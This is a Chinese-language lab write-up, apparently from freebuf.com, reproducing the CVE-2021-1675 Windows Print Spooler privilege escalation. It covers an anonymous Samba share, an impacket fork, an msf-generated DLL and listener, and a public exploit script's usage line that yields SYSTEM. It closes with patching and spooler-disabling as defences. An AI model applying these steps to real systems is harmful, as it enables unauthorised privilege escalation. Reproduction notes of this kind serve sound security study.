CVE-2021-1675 Windows Print Spooler权限提升漏洞复现 – 作者:Yuhzha

CVE-2021-1675 Windows Print Spooler权限提升漏洞复现

前言

本文内容是作者在平时漏洞复现时记录的笔记,内容参考了前辈的经验,如有侵权请联系我及时进行删除。

环境搭建

攻击机:Kali Linux (ip:192.168.18.131)
靶机:Windows Server 2016 (ip:192.168.18.134)
image.png

  1. Kali开启SMB匿名访问,靶机需能够正常进行访问

systemctl start smbd
systemctl start nmbd
mkdir -p /home/yuhzha/share
chmod 777 /home/yuhzha/share/
vim /etc/samba/smb.conf
ps:在使用github作者提供的配置时总会报错,我将其修改为以下内容才能复现成功,结尾会提供原项目地址。
[global]
    workgroup = WODGROUP
    security = user
    passdb backend = tdbsam
    printing = cups
    printcap name = cups
    load printers = yes
    cups options = raw
    map to guest = bad user
[share]                                      		
    comment = my first samba-file
    path = /home/yuhzha/share
    browseable = yes                    	
    public = yes
    writable = yes
    systemctl restart smbd
    systemctl restart nmbd

image.png
2. Kali安装impacket

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

复现过程

复现过程
1.在共享文件夹内使用msf生成dll
image.png
2.使用msf启动监听
image.png
3.使用EXP进行攻击(EXP在参考链接中的github项目里)
使用格式:python3 CVE-2021-1675.py 靶机账号:靶机密码@靶机ip ‘生成的dll地址’
image.png
报错不影响结果
image.png
成功利用,权限为system。

防御措施

  1. 升级系统,目前微软官方已针对支持的系统版本发布了修复该漏洞的安全补丁。

  2. 禁用Print Spooler服务。

参考链接

https://github.com/cube0x0/CVE-2021-1675
https://www.cnblogs.com/itwangqiang/p/13413894.html

来源:freebuf.com 2021-07-08 18:18:16 by: Yuhzha

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论